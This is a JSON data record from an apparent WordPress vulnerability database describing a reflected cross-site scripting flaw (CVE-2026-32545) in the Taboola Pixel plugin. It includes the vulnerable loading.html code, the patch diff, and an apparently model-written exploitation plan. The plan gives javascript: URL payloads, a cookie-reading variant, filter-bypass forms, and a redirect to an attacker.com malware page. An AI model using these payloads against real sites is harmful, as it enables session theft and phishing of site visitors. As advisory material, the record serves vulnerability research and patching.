[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f1H1RsY1XsSREzQujByPAS7D-bEEMb4Gs6MUWqTfeaUk":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":29,"research_vulnerable_code":30,"research_fix_diff":31,"research_exploit_outline":32,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":26,"source_links":36},"CVE-2026-32545","taboola-pixel-reflected-cross-site-scripting","Taboola Pixel \u003C= 1.1.4 - Reflected Cross-Site Scripting","The Taboola Pixel plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 1.1.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","taboola-pixel",null,"\u003C=1.1.4","1.1.5","medium",6.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-20 00:00:00","2026-03-26 20:39:00",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ffc06640e-3243-4369-bf1d-fb33f4d76ff7?source=api-prod",7,[22,23,24],"assets\u002Floading.html","readme.txt","taboola-pixel.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-32545\n\n## 1. Vulnerability Summary\nThe **Taboola Pixel** plugin for WordPress (versions \u003C= 1.1.4) contains a reflected Cross-Site Scripting (XSS) vulnerability. The flaw exists in the standalone HTML file `assets\u002Floading.html`. This file contains JavaScript logic designed to redirect users to a URL provided via a query parameter. However, the script fails to sanitize the input or validate the protocol of the redirect URL before assigning it to `window.location.href`. An attacker can provide a `javascript:` URI, which the browser will execute in the context of the WordPress site's origin.\n\n## 2. Attack Vector Analysis\n* **Vulnerable Endpoint**: `\u002Fwp-content\u002Fplugins\u002Ftaboola-pixel\u002Fassets\u002Floading.html`\n* **Vulnerable Parameter**: `url` (GET parameter)\n* **Authentication Required**: None (Unauthenticated)\n* **Preconditions**: The plugin must be installed and the `assets\u002Floading.html` file must be accessible (standard for WordPress plugin directories).\n* **Payload Type**: `javascript:` protocol handler.\n\n## 3. Code Flow\n1. A user (or victim) navigates to: `[target]\u002Fwp-content\u002Fplugins\u002Ftaboola-pixel\u002Fassets\u002Floading.html?url=[payload]`\n2. The browser loads `assets\u002Floading.html` and executes the embedded script.\n3. The script calls `getParameterByName('url')`.\n4. Inside `getParameterByName`:\n * It retrieves the query string using `window.location.href`.\n * A regular expression `\u002F[?&]url(=([^&#]*)|&|#|$)\u002F` extracts the value of the `url` parameter.\n * The value is passed through `decodeURIComponent()`.\n5. Back in the main script block, the variable `redirectUrl` now holds the decoded attacker input.\n6. The script checks `if (redirectUrl)`.\n7. If true, a `setTimeout` is triggered to execute `window.location.href = redirectUrl;` after 100ms.\n8. If `redirectUrl` is a `javascript:` string, the browser interprets this as a command to execute script in the current window's context.\n\n## 4. Nonce Acquisition Strategy\n**No nonce is required.**\nThe vulnerability is located in a static HTML file (`assets\u002Floading.html`) that executes entirely on the client side using JavaScript. It does not interact with the WordPress PHP backend, `admin-ajax.php`, or the REST API for its primary execution logic, thus bypassing all WordPress server-side security controls like nonces or capability checks.\n\n## 5. Exploitation Strategy\nThe goal is to demonstrate script execution in the context of the WordPress site.\n\n### Step-by-Step Plan:\n1. **Construct Payload**: Create a simple payload to prove execution, such as `javascript:alert(document.domain)`.\n2. **URL Encoding**: The payload must be URL-encoded to ensure it passes through the `getParameterByName` regex correctly.\n * `javascript:alert(document.domain)` -> `javascript%3Aalert(document.domain)`\n3. **Execute Request**: Use the `browser_navigate` tool to visit the vulnerable page with the payload.\n4. **Confirm Execution**: Use `browser_eval` to check if a specific side-effect occurred or simply observe the page behavior.\n\n### Target URL:\n```http\nGET \u002Fwp-content\u002Fplugins\u002Ftaboola-pixel\u002Fassets\u002Floading.html?url=javascript:console.log('XSS_SUCCESS_'+document.domain)\n```\n\n## 6. Test Data Setup\n1. **Plugin Installation**: Ensure the `taboola-pixel` plugin (v1.1.4) is installed and activated.\n2. **File Verification**: Verify the file exists at the expected path:\n ```bash\n wp eval \"echo file_exists(WP_PLUGIN_DIR . '\u002Ftaboola-pixel\u002Fassets\u002Floading.html') ? 'exists' : 'missing';\"\n ```\n\n## 7. Expected Results\n* The browser will navigate to the `loading.html` page.\n* After 100ms, the `setTimeout` callback will execute.\n* The `window.location.href` assignment will trigger the `javascript:` payload.\n* The console will display `XSS_SUCCESS_[site_domain]`.\n\n## 8. Verification Steps\n1. **Browser Log Check**: After navigating to the URL, use the browser tool to inspect console logs for the string `XSS_SUCCESS_`.\n2. **Manual Confirmation**: If using an interactive browser, an alert box should appear showing the site's domain.\n\n## 9. Alternative Approaches\n* **Cookie Exfiltration**: If the site does not use `HttpOnly` for all cookies, attempt to log the cookies:\n * `url=javascript:console.log(document.cookie)`\n* **Bypassing Basic Filters**: If a simple `javascript:` is blocked by a browser-level filter (unlikely for this specific sink), try:\n * `url=javascript:\u002F\u002F%0Aalert(1)` (Using a comment and newline)\n * `url=JaVaScRiPt:alert(1)` (Case sensitivity test)\n* **Redirection to Malicious Site**: To demonstrate the \"Reflected\" nature and redirect impact:\n * `url=https:\u002F\u002Fattacker.com\u002Fmalware.html` (Phishing vector)","The Taboola Pixel plugin for WordPress is vulnerable to unauthenticated Reflected Cross-Site Scripting (XSS) via the 'url' parameter in the standalone assets\u002Floading.html file. This occurs because the plugin fails to validate the protocol of the redirect URL before assigning it to window.location.href, allowing attackers to execute arbitrary JavaScript using the javascript: protocol.","\u002F\u002F assets\u002Floading.html lines 7-14\nfunction getParameterByName(name, url = window.location.href) {\n name = name.replace(\u002F[\\[\\]]\u002Fg, '\\\\$&');\n var regex = new RegExp('[?&]' + name + '(=([^&#]*)|&|#|$)'),\n results = regex.exec(url);\n if (!results) return null;\n if (!results[2]) return '';\n return decodeURIComponent(results[2].replace(\u002F\\+\u002Fg, ' '));\n}\n\n---\n\n\u002F\u002F assets\u002Floading.html lines 17-25\n\u002F\u002F Get the redirect URL from the query parameter\nvar redirectUrl = getParameterByName('url');\n\n\u002F\u002F Wait 100ms and then redirect\nif (redirectUrl) {\n setTimeout(function() {\n window.location.href = redirectUrl;\n }, 100);\n}","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Ftaboola-pixel\u002F1.1.4\u002Fassets\u002Floading.html\\t2026-01-05 10:09:24.000000000 +0000\\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Ftaboola-pixel\u002F1.1.5\u002Fassets\u002Floading.html\\t2026-02-24 10:30:06.000000000 +0000\\n@@ -15,9 +15,19 @@\\n \\n \u002F\u002F Get the redirect URL from the query parameter\\n var redirectUrl = getParameterByName('url');\\n-\\n+ \n+ \u002F\u002F Validate the URL protocol to prevent javascript: XSS\\n+ function isSafeUrl(url) {\\n+ try {\\n+ var parsed = new URL(url, window.location.href);\\n+ return parsed.protocol === 'http:' || parsed.protocol === 'https:';\\n+ } catch (e) {\\n+ return false;\\n+ }\\n+ }\\n+\\n \u002F\u002F Wait 100ms and then redirect\\n- if (redirectUrl) {\\n+ if (redirectUrl && isSafeUrl(redirectUrl)) {\\n setTimeout(function() {\\n window.location.href = redirectUrl;\\n }, 100);","An unauthenticated attacker can exploit this vulnerability by tricking a victim into visiting a specially crafted URL pointing to the plugin's loading.html file. The attack endpoint is \u002Fwp-content\u002Fplugins\u002Ftaboola-pixel\u002Fassets\u002Floading.html. The attacker provides a payload in the 'url' parameter using the 'javascript:' protocol (e.g., ?url=javascript:alert(document.domain)). When the page loads, the client-side JavaScript extracts the 'url' parameter and, after a 100ms delay, assigns it to window.location.href, causing the browser to execute the injected JavaScript in the context of the site.","gemini-3-flash-preview","2026-04-18 01:57:35","2026-04-18 01:57:56",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","1.1.4","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ftaboola-pixel\u002Ftags\u002F1.1.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ftaboola-pixel.1.1.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ftaboola-pixel\u002Ftags\u002F1.1.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ftaboola-pixel.1.1.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ftaboola-pixel\u002Ftags"]